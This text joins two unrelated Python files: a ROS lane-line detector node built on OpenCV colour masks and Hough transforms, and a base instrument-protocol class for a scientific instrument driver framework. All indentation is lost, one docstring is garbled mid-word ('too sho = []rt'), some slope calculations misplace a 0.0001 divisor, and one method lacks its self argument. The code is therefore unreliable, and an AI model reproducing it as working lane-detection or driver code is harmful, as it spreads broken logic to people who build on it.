from ino_car.msg import LaneLine, LaneLines
class LineDetectorNode(object):
def __init__(self):
self.node_name = "LineDetectorNode"
self.verbose = None
# Thread lock
self.thread_lock = threading.Lock()
# Constructor of line detector
self.bridge = CvBridge()
# Publishers
self.pub_image = rospy.Publisher("~image_with_lines", Image, queue_size=1)
self.pub_lines = rospy.Publisher("~segment_list", LaneLines, queue_size=1)
# Subscribers
self.sub_image = rospy.Subscriber("~image", CompressedImage, self.cbImage, queue_size=1)
#------------------------------------------
self.bottom_width = 0.85 # width of bottom edge of trapezoid, expressed as percentage of image width
self.top_width = 0.75 # ditto for top edge of trapezoid
self.height = 0.4 # height of the trapezoid expressed as percentage of image height
self.height_from_bottom = 0.05 # height from bottom as percentage of image height
self.x_translation = -0.01 # Can be +ve or -ve. Translation of midpoint of region of interest along x axis
self.center =[0,0]
self.hasleft= False
self.hasright = False
self.lanewidth =400
# -----------------------------------------
#color
self.hsv_white1= np.array([0,0,150])
self.hsv_white2= np.array([180,50,255])
self.hsv_yellow1= np.array([25,120,90])
self.hsv_yellow2= np.array([45,255,255])
self.hsv_red1= np.array([0,140,100])
self.hsv_red2= np.array([15,255,255])
self.hsv_red3= np.array([165,140,100])
self.hsv_red4= np.array([180,255,255])
self.dilation_kernel_size = 3
#----------------------------------------
def _colorFilter(self,hsv,color):
# threshold colors in HSV space
bw_red = cv2.inRange(hsv, self.hsv_red1, self.hsv_red2)
bw_white = cv2.inRange(hsv, self.hsv_white1, self.hsv_white2)
bw_yellow = cv2.inRange(hsv, self.hsv_yellow1, self.hsv_yellow2)
if color == 'white':
bw = bw_white
elif color == 'yellow':
bw = bw_yellow
elif color == 'red':
bw = bw_red
# binary dilation
kernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE,(self.dilation_kernel_size, self.dilation_kernel_size))
bw = cv2.dilate(bw, kernel)
if self.verbose:
color_segments = self.color_segment(bw_white,bw_red,bw_yellow)
else:
color_segments = []
return bw, color_segments
def detectLines(self,img,color,img_shape):
lines = self.hough_transform(img)
# Removing horizontal lines detected from hough transform
lane_lines = self.filter_horizontal_short_lines(lines)
# Separating lines on left and right side of the highway lane
lane_lines_=[]
if color == 'yellow':
if lane_lines is None:
return None,None
for l in lane_lines:
lane_lines_ += [(l[0][0], l[0][1], l[0][2], l[0][3])]
lane_line = self.draw_single_line(lane_lines_ ,img_shape)
return lane_line,lane_lines
if color == 'white':
if lane_lines is None:
print 'no white'
return None,None,None
for l in lane_lines:
lane_lines_ += [(l[0][0], l[0][1], l[0][2], l[0][3])]
left_lines,right_lines = self.separate_white_lines(lane_lines_)
right_lane_line = self.draw_single_line( right_lines,img_shape )
left_lane_line = self.draw_single_line( left_lines,img_shape )
return left_lane_line ,right_lane_line ,lane_lines
def filter_horizontal_short_lines(self,lines):
"""
1.Removes all lines with slope between -10 and +10 degrees
This is done because for highway lane lines the lines will be closer to being
vertical from the view of the front mounted camera
2.Removes too sho = []rt
"""
if lines is None:
return
#for l in lines:
# dist = math.sqrt( (l[0][2] - l[0][0])**2 + (l[0][3] - l[0][1])**2 )
# print dist
non_short_lines = [l for l in lines if
not math.sqrt( (l[0][2] - l[0][0])**2 + (l[0][3] - l[0][1])**2 ) < 20]
non_vertical_lines = [l for l in non_short_lines if
not float(l[0][2] - l[0][0]) == 0]
vertical_lines = [l for l in lines if
float(l[0][2] - l[0][0]) == 0]
non_horizontal_lines = [l for l in non_vertical_lines if
not -10 <= np.rad2deg(np.arctan(float(l[0][3] - l[0][1]) /float(l[0][2] - l[0][0])) ) <= 10]
if len(vertical_lines) != 0 :
for v in vertical_lines:
non_horizontal_lines.append(v)
non_horizontal_lines = np.array(non_horizontal_lines)
return non_horizontal_lines
def cbImage(self, image_msg):
# Start a daemon thread to process the image
thread = threading.Thread(target=self.processImage,args=(image_msg,))
thread.setDaemon(True)
thread.start() #start execution
# Returns rightaway
def loginfo(self, s):
rospy.loginfo('[%s] %s' % (self.node_name, s))
# generate color segments
def color_segment(area_white, area_red, area_yellow):
B, G, R = 0, 1, 2
def white(x):
x = cv2.cvtColor(x, cv2.COLOR_GRAY2BGR)
return x
def red(x):
x = cv2.cvtColor(x, cv2.COLOR_GRAY2BGR)
x[:,:,R] *= 1
x[:,:,G] *= 0
x[:,:,B] *= 0
return x
def yellow(x):
x = cv2.cvtColor(x, cv2.COLOR_GRAY2BGR)
x[:,:,R] *= 1
x[:,:,G] *= 1
x[:,:,B] *= 0
return x
h, w = area_white.shape
orig = [area_white, area_red, area_yellow]
masks = [white(area_white), red(area_red), yellow(area_yellow)]
res = np.zeros((h,w,3), dtype=np.uint8)
for i, m in enumerate(masks):
nz = (orig[i] > 0) * 1.0
assert nz.shape == (h, w), nz.shape
for j in [0, 1, 2]:
res[:,:,j] = (1-nz) * res[:,:,j].copy() + (nz) * m[:,:,j]
return res
def canny_edge_median(self,img):
"""canny_edge_median takes an image and does auto-thresholding
using median to compute the edges using canny edge technique
"""
median = np.median(img)
low_threshold = median * 0.66
upper_threshold = median * 1.33
return cv2.Canny(img, low_threshold, upper_threshold)
def region_of_interest(self,img, vertices):
"""
Only keeps the part of the image enclosed in the polygon and
sets rest of the image to black
"""
mask = np.zeros_like(img)
mask_color = 255
# filling pixels inside the polygon defined by "vertices" with the fill color
cv2.fillPoly(mask, vertices, mask_color)
# returning the image only where mask pixels are nonzero
masked_image = cv2.bitwise_and(img, mask)
return masked_image, mask
def highway_lane_lines(self,img,img_shape ):
"""
Computes hough transform, separates lines on left and right side of the highway lane computed
by hough transform, then forms a single line on the right side and left side
"""
# Computing lines with hough transform
lines = self.hough_transform(img)
if lines is None:
return None,None,None
# Removing horizontal lines detected from hough transform
lane_lines = self.filter_horizontal_lines(lines)
# Separating lines on left and right side of the highway lane
left_lines, right_lines = self.separate_lines(lane_lines)
# Filtering lines i.e. removing left lines that are closer to right side and vice versa
left_lines, right_lines = self.filter_lane_lines(left_lines, right_lines,)
# Computing one single line for left and right side
left_side_line = self.draw_single_line(left_lines,img_shape )
right_side_line = self.draw_single_line(right_lines,img_shape )
return left_side_line, right_side_line,lines
#return left_lines, right_lines,lane_lines
def hough_transform(self,img):
"""
Computes lines using the probabilistic hough transform provided by OpenCV
Thus it computes lines of finite size and returns them in form of an array
:param img: masked edge detected image with only region of interest
:return:
"""
# Parameters
rho = 2 # distance resolution in pixels of the Hough grid
theta = 1 * np.pi / 18 # angular resolution in radians of the Hough grid
threshold = 10 # minimum number of votes (intersections in Hough grid cell)
min_line_length = 10 # m0inimum number of pixels making up a line
max_line_gap = 15 # maximu gap in pixels between connectable line segments
lines = cv2.HoughLinesP(img, rho, theta, threshold, np.array([]), minLineLength=min_line_length,
maxLineGap=max_line_gap)
return lines
def filter_horizontal_lines(self,lines):
"""
Removes all lines with slope between -10 and +10 degrees
This is done because for highway lane lines the lines will be closer to being
vertical from the view of the front mounted camera
"""
if lines is None:
return
non_horizontal_lines = [l for l in lines if
not -10 <= np.rad2deg(np.arctan(float((l[0][3] - l[0][1])) / 0.0001*float((l[0][2] - l[0][0])))) <= 10]
non_horizontal_lines = np.array(non_horizontal_lines)
return non_horizontal_lines
def separate_white_lines(self,lines):
"""
Separates the left and right white lines of the highway lane
:param lines: an array containing the lines which make left and right side of highway lane
"""
if lines is None:
return
x_m=0
for x1, y1, x2, y2 in lines:
x_m += x1
x_m += x2
x_m = x_m/2
right_lines = [l for l in lines if l[0] >= x_m]
left_lines = [l for l in lines if l[0] < x_m]
return left_lines,right_lines
def separate_lines(self,lines):
"""
Separates the left and right lines of the highway lane
:param lines: an array containing the lines which make left and right side of highway lane
"""
left_lines = []
right_lines = []
# Here we separate coordinates of left and right-side lines of the highway lane
# Since the y-axis is positive in downwards direction and x-axis is positive in right hand direction
# With origin at the top left corner of the image
# A negative slope will mean that the line is on the left ( in normal coordinate system it
# will mean on the right side)
# A positive slope will mean that the line is on the right ( in normal coordinate system it
# will mean on the left side)
for l in lines:
slope = float((l[0][3] - l[0][1])) / 0.0001+float((l[0][2] - l[0][0]))
if slope < 0:
# Slope is negative hence line is on the left side
left_lines += [(l[0][0], l[0][1], l[0][2], l[0][3])]
elif slope > 0:
# Slope is positive hence line is on the right side
right_lines += [(l[0][0], l[0][1], l[0][2], l[0][3])]
else:
print("Something looks fishy here")
return left_lines, right_lines
def filter_lane_lines(self,left_lines, right_lines):
"""
This function removes lines from left_lines that are closer to the right-side of the highway lane
and from right_lines removes lines that are closer to left-side of highway lane. It also removes
the lines which are more or less than 10 degrees from the median slope of each side.
"""
if len(left_lines) == 0 or len(right_lines) == 0:
return left_lines, right_lines
# Filtering lines that lie close to the other side, for instance
# lines in left_lines array that are closer to the right lane line
x_top_left = []
for x1, y1, x2, y2 in left_lines:
x_top_left += [x2]
x_top_left_median = np.median(x_top_left)
left_lines_final = [l for l in left_lines if l[2] <= x_top_left_median]
slope_left_lines = []
for x1, y1, x2, y2 in left_lines_final:
slope_left_lines += [np.rad2deg(np.arctan((y2 - y1) / (x2 - x1)))]
x_top_right = []
for x1, y1, x2, y2 in right_lines:
x_top_right += [x1]
x_top_right_median = np.median(x_top_right)
right_lines_final = [l for l in right_lines if l[0] >= x_top_right_median]
slope_right_lines = []
for x1, y1, x2, y2 in right_lines_final:
slope_right_lines += [np.rad2deg(np.arctan((y2 - y1)/(x2 - x1)))]
# Filtering based on slope
median_left_lines_slope = np.median(slope_left_lines)
left_lines_final_filtered = []
for i in range(len(left_lines_final)):
if (-1 + median_left_lines_slope) <= slope_left_lines[i] <= (10 + median_left_lines_slope):
left_lines_final_filtered += [left_lines_final[i]]
median_right_lines_slope = np.median(slope_right_lines)
right_lines_final_filtered = []
for i in range(len(right_lines_final)):
if (-5 + median_right_lines_slope) <= slope_right_lines[i] <= (5 + median_right_lines_slope):
right_lines_final_filtered += [right_lines_final[i]]
return left_lines_final_filtered, right_lines_final_filtered
def draw_single_line(self,lines,img_shape):
"""
Takes in an array of lines and combines them into a single line
"""
if len(lines) == 0:
return None
# Maximum and minimum y-coordinate for the sigle line on left and right side
y_max = int(img_shape[0] - img_shape[0] * self.height_from_bottom)
y_min = int(img_shape[0] - img_shape[0] * self.height_from_bottom) - int(img_shape[0] * self.height)
# Computing the top and bottom x co-ordinate obtained by extrapolating
# the limited length lines.
x_top = []
x_bottom = []
for x1, y1, x2, y2 in lines:
z = np.polyfit([x1, x2], [y1, y2], 1)
m, c = z
x_top.append(int((y_min - c) / m))
x_bottom.append(int((y_max - c) / m))
x_avg_top = np.int(np.median(x_top))
x_avg_bottom = np.int(np.median(x_bottom))
return [x_avg_bottom, y_max, x_avg_top, y_min]
def compute_mask_vertices(self,img_shape):
"""
This function takes an image as input, requires the parameters to be set manually
and generates the coordinates for the mask vertices.
"""
vertices = np.array(
[[[(img_shape[1] * (1 - self.bottom_width)) // 2, int(img_shape[0] - img_shape[0] * self.height_from_bottom)],
[int(img_shape[1] *self.bottom_width) + (img_shape[1] * (1 - self.bottom_width)) // 2,
int(img_shape[0] - img_shape[0] * self.height_from_bottom)],
[int(img_shape[1] * self.top_width) + (img_shape[1] * (1 - self.top_width)) // 2,
int(img_shape[0] - img_shape[0] * self.height_from_bottom) - int(img_shape[0] * self.height)],
[(img_shape[1] * (1 - self.top_width)) // 2,
int(img_shape[0] - img_shape[0] * self.height_from_bottom) - int(img_shape[0] * self.height)]]],
dtype=np.int32)
vertices = np.array(vertices[:] - [self.x_translation * img_shape[1], 0], dtype='int')
return vertices
def processImage(self, image_msg):
if not self.thread_lock.acquire(False):
# Return immediately if the thread is locked
return
try:
self.processImage_(image_msg)
finally:
# Release the thread lock
self.thread_lock.release()
def processImage_(self, image_msg):
# Decode from compressed image with OpenCV
try:
image_cv = image_cv_from_jpg(image_msg.data)
except ValueError as e:
self.loginfo('Could not decode image: %s' % e)
return
# Resize and crop image
hei_original, wid_original = image_cv.shape[0:2]
gray = cv2.cvtColor(image_cv, cv2.COLOR_BGR2GRAY)
# Applying gaussian blur
blur = cv2.GaussianBlur(gray, (5, 5), 0)
# color
hsv = cv2.cvtColor(image_cv, cv2.COLOR_BGR2HSV)
white, color_segments = self._colorFilter(hsv,'white') #hsv: white/black image color_segments: color space with color
yellow, color_segments = self._colorFilter(hsv,'yellow')
# Computing edges
img_edges = self.canny_edge_median(blur)
# Computing region of interest
img_shape = gray.shape
my_vertices = self.compute_mask_vertices(img_shape)
masked_image, mask = self.region_of_interest(img_edges, my_vertices)
#bitwise edge, color, mask
edge_yellow = cv2.bitwise_and(yellow, masked_image)
edge_white = cv2.bitwise_and(white, masked_image)
# Computing lane lines
right_white_line,left_white_line, white_lines = self.detectLines(edge_white,'white',img_shape) #the order of right and left have to exchange because the different coordinate of image frame and the normal frame
yellow_line, yellow_lines = self.detectLines(edge_yellow,'yellow',img_shape)
# handle two white line at same side
if left_white_line and right_white_line:
if ((left_white_line[0]-left_white_line[2])/2 - (yellow_line[0]- yellow_line[2])/2) > 0:
right_white_line = map(lambda x: x/2, list(np.array(right_white_line)+np.array(left_white_line)))
left_white_line = None
if yellow_line and right_white_line:
if (yellow_line[0]+yellow_line[2]) - (right_white_line[0] +right_white_line[2]) > self.lanewidth:
right_white_line = None
if yellow_line and right_white_line:
if (yellow_line[0]+yellow_line[2]) > (right_white_line[0] +right_white_line[2]):
yellow_line = None
# SegmentList constructor
segmentList = LaneLines()
segmentList.header.stamp = image_msg.header.stamp
image_with_lines = np.copy(image_cv)
# draw line on image_With_line
if yellow_line is not None:
cv2.line(image_with_lines, (yellow_line[0], yellow_line[1]), (yellow_line[2], yellow_line[3]), (0, 255, 0), 5)
self.hasleft = True
segmentList.lanelines.extend(self.toSegmentMsg(yellow_line,LaneLine.LEFT))
if right_white_line is not None:
cv2.line(image_with_lines, (right_white_line[0], right_white_line[1]), (right_white_line[2], right_white_line[3]), (0, 0, 255), 5)
self.hasright = True
segmentList.lanelines.extend(self.toSegmentMsg(right_white_line,LaneLine.RIGHT))
# Publish segmentList
self.pub_lines.publish(segmentList)
# plot on image_With_line
if white_lines is not None:
for i,pl in enumerate(white_lines):
cv2.line(image_with_lines, (pl[0][0], pl[0][1]), (pl[0][2], pl[0][3]), (255, 0, 0),2)
if yellow_lines is not None:
for i,pl in enumerate(yellow_lines):
cv2.line(image_with_lines, (pl[0][0], pl[0][1]), (pl[0][2], pl[0][3]), (255, 0, 0),2)
'''
if self.hasleft and self.hasright:
self.center[0] = (final_left_line[0]+final_right_line[0]+final_left_line[2] +final_right_line[2])/4
self.center[1] = (final_left_line[1]+final_right_line[1]+final_left_line[3] +final_right_line[3])/4
cv2.circle(image_with_lines, (self.center[0] ,self.center[1]), 3, (0,255,255), thickness=3, lineType=8, shift=0)
self.hasleft = False
self.hasright = False
if self.hasleft and not self.hasright:
self.center[0] = (final_left_line[0]+final_left_line[2] )/2 + self.lanewidth/2
self.center[1] = (final_left_line[1]+final_left_line[3] )/2
cv2.circle(image_with_lines, (self.center[0] ,self.center[1]), 3, (0,255,255), thickness=3, lineType=8, shift=0)
self.hasleft = False
self.hasright = False
if not self.hasleft and self.hasright:
self.center[0] = (final_right_line[0]+final_right_line[2] )/2 - self.lanewidth/2
self.center[1] = (final_right_line[1]+final_right_line[3] )/2
cv2.circle(image_with_lines, (self.center[0] ,self.center[1]), 3, (0,255,255), thickness=3, lineType=8, shift=0)
self.hasleft = False
self.hasright = False
'''
cv2.polylines(image_with_lines,my_vertices,True,(0,255,255))
# Publish the frame with lines
image_msg_out = self.bridge.cv2_to_imgmsg(image_with_lines, "bgr8")
image_msg_out.header.stamp = image_msg.header.stamp
self.pub_image.publish(image_msg_out)
def toSegmentMsg(self, line, side):
segmentMsgList = []
segment = LaneLine()
segment.side = side
segment.pixels_line[0].x = line[0]
segment.pixels_line[0].y = line[1]
segment.pixels_line[1].x = line[2]
segment.pixels_line[1].y = line[3]
segmentMsgList.append(segment)
return segmentMsgList
def onShutdown(self):
self.loginfo("Shutdown.")
if __name__ == '__main__':
rospy.init_node('line_detector',anonymous=False)
line_detector_node = LineDetectorNode()
rospy.on_shutdown(line_detector_node.onShutdown)
rospy.spin()
|
instrument_protocol.py
|
#!/usr/bin/env python
"""
@package ion.services.mi.instrument_protocol Base instrument protocol structure
@file ion/services/mi/instrument_protocol.py
@author Steve Foley,
Bill Bollenbacher
@brief Instrument protocol classes that provide structure towards the
nitty-gritty interaction with individual instruments in the system.
@todo Figure out what gets thrown on errors
"""
import time
import re
from functools import partial
from threading import Thread
from mi.core.log import get_logger, get_logging_metaclass
from mi.core.instrument.protocol_param_dict import ParameterDictVisibility
from mi.core.common import BaseEnum, InstErrorCode
from mi.core.instrument.data_particle import RawDataParticle
from mi.core.instrument.instrument_driver import DriverConfigKey
from mi.core.driver_scheduler import DriverScheduler
from mi.core.driver_scheduler import DriverSchedulerConfigKey
from mi.core.instrument.instrument_driver import DriverAsyncEvent
from mi.core.instrument.instrument_driver import DriverProtocolState
from mi.core.instrument.instrument_driver import ConfigMetadataKey
from mi.core.instrument.instrument_driver import DriverParameter
from mi.core.instrument.instrument_driver import ResourceAgentEvent
from mi.core.instrument.protocol_param_dict import ProtocolParameterDict
from mi.core.instrument.protocol_cmd_dict import ProtocolCommandDict
from mi.core.instrument.driver_dict import DriverDict
from mi.core.exceptions import InstrumentTimeoutException
from mi.core.exceptions import InstrumentProtocolException
from mi.core.exceptions import InstrumentParameterException
from mi.core.exceptions import NotImplementedException
from mi.core.exceptions import InstrumentParameterExpirationException
__author__ = 'Steve Foley'
__license__ = 'Apache 2.0'
log = get_logger()
MAX_BUFFER_SIZE = 32768
DEFAULT_CMD_TIMEOUT = 20
DEFAULT_WRITE_DELAY = 0
RE_PATTERN = type(re.compile(""))
class InterfaceType(BaseEnum):
"""The methods of connecting to a device"""
ETHERNET = 'ethernet'
SERIAL = 'serial'
class InitializationType(BaseEnum):
NONE = 0,
STARTUP = 1
DIRECTACCESS = 2
class InstrumentProtocol(object):
"""
Base instrument protocol class.
"""
__metaclass__ = get_logging_metaclass('trace')
def __init__(self, driver_event):
"""
Base constructor.
@param driver_event The callback for asynchronous driver events.
"""
# Event callback to send asynchronous events to the agent.
self._driver_event = driver_event
# The connection used to talk to the device.
self._connection = None
# The protocol state machine.
self._protocol_fsm = None
# The parameter, command, and driver dictionaries.
self._param_dict = ProtocolParameterDict()
self._cmd_dict = ProtocolCommandDict()
self._driver_dict = DriverDict()
# Dictionary to store recently generated particles
self._particle_dict = {}
# The spot to stash a configuration before going into direct access mode
self._pre_direct_access_config = None
# Driver configuration passed from the user
self._startup_config = {}
# scheduler config is a bit redundant now, but if we ever want to
# re-initialize a scheduler we will need it.
self._scheduler = None
self._scheduler_callback = {}
self._scheduler_config = {}
# Set the initialization type to startup so that startup parameters
# are applied at the first opertunity.
self._init_type = InitializationType.STARTUP
self._response_handlers = {}
self._build_handlers = {}
self._newline = None
self._chunker = None
self._direct_commands = {}
self._character_delay = 0.0
self._display_name = 'instrument'
########################################################################
# Common handlers
########################################################################
def _handler_get(self, *args, **kwargs):
"""
Get device parameters from the parameter dict. First we set a baseline timestamp
that all data expirations will be calculated against. Then we try to get parameter
value. If we catch an expired parameter then we will update all parameters and get
values using the original baseline time that we set at the beginning of this method.
Assuming our _update_params is updating all parameter values properly then we can
ensure that all data will be fresh. Nobody likes stale data!
@param args[0] list of parameters to retrieve, or DriverParameter.ALL.
@raise InstrumentParameterException if missing or invalid parameter.
@raise InstrumentParameterExpirationException If we fail to update a parameter
on the second pass this exception will be raised on expired data
"""
next_state = None
# Grab a baseline time for calculating expiration time. It is assumed
# that all data if valid if acquired after this time.
expire_time = self._param_dict.get_current_timestamp()
# build a list of parameters we need to get
param_list = self._get_param_list(*args, **kwargs)
try:
# Take a first pass at getting parameters. If they are
# expired an exception will be raised.
result = self._get_param_result(param_list, expire_time)
except InstrumentParameterExpirationException as e:
# In the second pass we need to update parameters, it is assumed
# that _update_params does everything required to refresh all
# parameters or at least those that would expire.
log.debug("Parameter expired, refreshing, %s", e)
self._update_params()
# Take a second pass at getting values, this time is should
# have all fresh values.
log.debug("Fetching parameters for the second time")
result = self._get_param_result(param_list, expire_time)
return next_state, result
########################################################################
# Helper methods
########################################################################
def _update_params(self):
raise NotImplementedException()
def _init_params(self):
"""
Initialize parameters based on initialization type. If we actually
do some initialization (either startup or DA) after we are done
set the init type to None so we don't initialize again.
@raises InstrumentProtocolException if the init_type isn't set or it is unknown
"""
if self._init_type == InitializationType.STARTUP:
log.debug("_init_params: Apply Startup Config")
self.apply_startup_params()
self._init_type = InitializationType.NONE
elif self._init_type == InitializationType.DIRECTACCESS:
log.debug("_init_params: Apply DA Config")
self.apply_direct_access_params()
self._init_type = InitializationType.NONE
pass
elif self._init_type == InitializationType.NONE:
log.debug("_init_params: No initialization required")
pass
elif self._init_type is None:
raise InstrumentProtocolException("initialization type not set")
else:
raise InstrumentProtocolException("Unknown initialization type: %s" % self._init_type)
def got_data(self, port_agent_packet):
"""
Called by the instrument connection when data is available. Defined in subclasses.
"""
raise NotImplementedException()
def _got_chunk(self, data, timestamp):
raise NotImplementedException()
def _get_param_result(self, param_list, expire_time):
"""
return a dictionary of the parameters and values
@param expire_time: baseline time for expiration calculation
@return: dictionary of values
@raise InstrumentParameterException if missing or invalid parameter
@raise InstrumentParameterExpirationException if value is expired.
"""
result = {}
for param in param_list:
val = self._param_dict.get(param, expire_time)
result[param] = val
return result
def _verify_not_readonly(self, params_to_set, startup=False):
"""
Verify that the parameters we are attempting to set in upstream methods
are not readonly. A parameter is considered read only if it is characterized
as read-only or immutable. However, if the startup flag is passed in as true
then immutable will be considered settable.
@param params_to_set: dictionary containing parameters to set
@param startup: startup flag, if set don't verify visibility
@return: True if we aren't violating visibility
@raise: InstrumentParameterException if we violate visibility
"""
log.debug("Verify parameters are not read only, startup: %s", startup)
if not isinstance(params_to_set, dict):
raise InstrumentParameterException('parameters not a dict.')
readonly_params = self._param_dict.get_visibility_list(ParameterDictVisibility.READ_ONLY)
if not startup:
readonly_params += self._param_dict.get_visibility_list(ParameterDictVisibility.IMMUTABLE)
log.debug("Read only params: %s", readonly_params)
not_settable = []
for (key, val) in params_to_set.iteritems():
if key in readonly_params:
not_settable.append(key)
if len(not_settable) > 0:
raise InstrumentParameterException("Attempt to set read only parameter(s) (%s)" % not_settable)
return True
def _extract_sample(self, particle_class, regex, line, timestamp, publish=True):
"""
Extract sample from a response line if present and publish
parsed particle
@param particle_class The class to instantiate for this specific
data particle. Parameterizing this allows for simple, standard
behavior from this routine
@param regex The regular expression that matches a data sample
@param line string to match for sample.
@param timestamp port agent timestamp to include with the particle
@param publish boolean to publish samples (default True). If True,
two different events are published: one to notify raw data and
the other to notify parsed data.
@retval dict of dicts {'parsed': parsed_sample, 'raw': raw_sample} if
the line can be parsed for a sample. Otherwise, None.
@todo Figure out how the agent wants the results for a single poll
and return them that way from here
"""
if regex.match(line):
particle = particle_class(line, port_timestamp=timestamp)
parsed_sample = particle.generate()
# Add an entry to the particle dictionary, with the particle class as the key
self._particle_dict[particle.data_particle_type()] = parsed_sample
if publish and self._driver_event:
self._driver_event(DriverAsyncEvent.SAMPLE, parsed_sample)
return parsed_sample
def get_current_state(self):
"""
Return current state of the protocol FSM.
"""
return self._protocol_fsm.get_current_state()
def get_resource_capabilities(self, current_state=True):
"""
"""
res_cmds = self._protocol_fsm.get_events(current_state)
res_cmds = self._filter_capabilities(res_cmds)
res_params = self._param_dict.get_keys()
return [res_cmds, res_params]
def _filter_capabilities(self, events):
"""
"""
return events
def _async_agent_state_change(self, agent_state):
"""
Used when we need to change the agent state from an asych
process.
@param agent_state: New agent state
"""
val = {
'event': ResourceAgentEvent.CHANGE_STATE_ASYNC,
'args': [agent_state]
}
self._driver_event(DriverAsyncEvent.AGENT_EVENT, val)
def _async_raise_fsm_event(self, event, *args, **kwargs):
"""
Spawn a new thread and raise an FSM event. This is intended to be used from the listener
thread. If not used the port agent client could be blocked when a FSM event is raised.
@param event: event to raise
@param args: args for the event
@param kwargs: ignored
"""
log.info("_async_raise_fsm_event: starting new thread to raise event")
args = list(args)
log.debug('_async_raise_fsm_event event: %s args: %r', event, args)
args.insert(0, event)
def run():
try:
self._protocol_fsm.on_event(*args)
except Exception as e:
log.error('Exception in asynchronous thread: %r', e)
self._driver_event(DriverAsyncEvent.ERROR, e)
log.info('_async_raise_fsm_event: event complete. bub bye thread. (%r)', args)
new_thread = Thread(target=run)
new_thread.daemon = True
new_thread.start()
########################################################################
# Scheduler interface.
########################################################################
def _remove_scheduler(self, name):
"""
remove a scheduler in a driver.
@param name the name of the job
@raise KeyError if we try to remove a non-existent job
"""
if not self._scheduler_callback.get(name):
raise KeyError("scheduler does not exist for '%s'" % name)
log.debug("removing scheduler: %s", name)
callback = self._scheduler_callback.get(name)
try:
self._scheduler.remove_job(callback)
except KeyError:
log.warning('Unable to remove job from scheduler.')
self._scheduler_callback.pop(name)
self._scheduler_config.pop(name, None)
def _add_scheduler(self, name, callback):
"""
Stage a scheduler in a driver. The job will actually be configured
and started by initialize_scheduler
@param name the name of the job
@param callback the handler when the job is triggered
@raise KeyError if we try to add a job twice
"""
if self._scheduler_callback.get(name):
raise KeyError("duplicate scheduler exists for '%s'" % name)
log.debug("Add scheduler callback: %s", name)
self._scheduler_callback[name] = callback
self._add_scheduler_job(name)
def _add_scheduler_event(self, name, event):
"""
Create a scheduler, but instead of passing a callback we pass in
an event to raise. A callback function is dynamically created
to do this.
@param name the name of the job
@param event: event to raise when the scheduler is triggered
@raise KeyError if we try to add a job twice
"""
# Create a callback for the scheduler to raise an event
def event_callback(self, event):
log.info("driver job triggered, raise event: %s" % event)
self._protocol_fsm.on_event(event)
# Dynamically create the method and add it
method = partial(event_callback, self, event)
self._add_scheduler(name, method)
def _add_scheduler_job(self, name):
"""
Map the driver configuration to a scheduler configuration. If
the scheduler has been started then also add the job.
@param name the name of the job
@raise KeyError if job name does not exists in the callback config
@raise KeyError if job is already configured
"""
# Do nothing if the scheduler isn't initialized
if not self._scheduler:
return
callback = self._scheduler_callback.get(name)
if not callback:
raise KeyError("callback not defined in driver for '%s'" % name)
if self._scheduler_config.get(name):
raise KeyError("scheduler job already configured '%s'" % name)
scheduler_config = self._get_scheduler_config()
log.debug("Scheduler config: %r", scheduler_config)
# No config? Nothing to do then.
if scheduler_config is None:
return
job_config = scheduler_config.get(name)
if job_config:
# Store the scheduler configuration
self._scheduler_config[name] = {
DriverSchedulerConfigKey.TRIGGER: job_config.get(DriverSchedulerConfigKey.TRIGGER),
DriverSchedulerConfigKey.CALLBACK: callback
}
config = {name: self._scheduler_config[name]}
log.debug("Scheduler job with config: %r", config)
# start the job. Note, this lazily starts the scheduler too :)
self._scheduler.add_config(config)
def _get_scheduler_config(self):
"""
Get the configuration dictionary to use for initializing jobs
Returned dictionary structure:
{
'job_name': {
DriverSchedulerConfigKey.TRIGGER: {}
}
}
@return: scheduler configuration dictionary
"""
# Currently the startup config is in the child class.
config = self._startup_config
return config.get(DriverConfigKey.SCHEDULER)
def initialize_scheduler(self):
"""
Activate all configured schedulers added using _add_scheduler.
Timers start when the job is activated.
"""
log.debug("Scheduler config: %r", self._get_scheduler_config())
log.debug("Scheduler callbacks: %r", self._scheduler_callback)
self._scheduler = DriverScheduler()
for name in self._scheduler_callback.keys():
log.debug("Add job for callback: %s", name)
self._add_scheduler_job(name)
#############################################################
# Gap recovery logic
#############################################################
def _start_gap_recovery(self, *args, **kwargs):
"""
Currently this is just a mock implementation so the agent
tests could be put in place. Before this code goes into
production it needs to be completed.
Start a new gap recovery thread to publish samples.
"""
raise NotImplementedException("Needs to be implemented")
#############################################################
# Configuration logic
#############################################################
def apply_startup_params(self):
"""
Apply the startup values previously stored in the protocol to
the running config of the live instrument. The startup values are the
values that are (1) marked as startup parameters and are (2) the "best"
value to use at startup. Preference is given to the previously-set init
value, then the default value, then the currently used value.
This default method assumes a dict of parameter name and value for
the configuration.
@raise InstrumentParameterException If the config cannot be applied
"""
# Let's give it a try in unknown state
log.debug("apply_startup_params start")
config = self.get_startup_config()
log.debug("apply_startup_params: startup config: %s", config)
readonly = self._param_dict.get_visibility_list(ParameterDictVisibility.READ_ONLY)
log.debug("apply_startup_params: Read only keys: %s", readonly)
for (key, val) in config.iteritems():
if key in readonly:
raise InstrumentParameterException("Attempt to set read only parameter (%s)" % key)
self._set_params(config, True)
def apply_direct_access_params(self):
"""
Apply the da params values previously stored in the protocol to
the running config of the live instrument.
@raise InstrumentParameterException If the config cannot be applied
"""
# Let's give it a try in unknown state
log.debug("apply_direct_access_params start")
config = self.get_direct_access_config()
log.debug("apply_direct_access_params: direct_access config: %s", config)
self._set_params(config, True)
def _set_params(self, *args, **kwargs):
"""
Issue commands to the instrument to set various parameters. If
startup is set to true that means we are setting startup values
and immutable parameters can be set. Otherwise only READ_WRITE
parameters can be set.
must be overloaded in derived classes
@param params dictionary containing parameter name and value
@param startup bool try is we are initializing, false otherwise
@raise NotImplementedException
"""
raise NotImplementedException("_set_params must be overloaded")
def set_init_params(self, config):
"""
Set the initialization parameters to the given values in the protocol
parameter dictionary.
@param config The parameter_name/value to set in the initialization
fields of the parameter dictionary
@raise InstrumentParameterException If the config cannot be set
"""
if not isinstance(config, dict):
raise InstrumentParameterException("Invalid init config format")
self._startup_config = config
param_config = config.get(DriverConfigKey.PARAMETERS)
if param_config:
for name in param_config.keys():
log.debug("Setting init value for %s to %s", name, param_config[name])
self._param_dict.set_init_value(name, param_config[name])
def enable_da_initialization(self):
"""
Tell the protocol to initialize parameters using the stored direct access
config when in a state that can set parameters
"""
self._init_type = InitializationType.DIRECTACCESS
def store_direct_access_config(self, config):
"""
Save the direct access configuration in the object. This is generally
called from the driver because it is responsible for reading the config.
@param config DA configuration to store.
"""
self._pre_direct_access_config = config
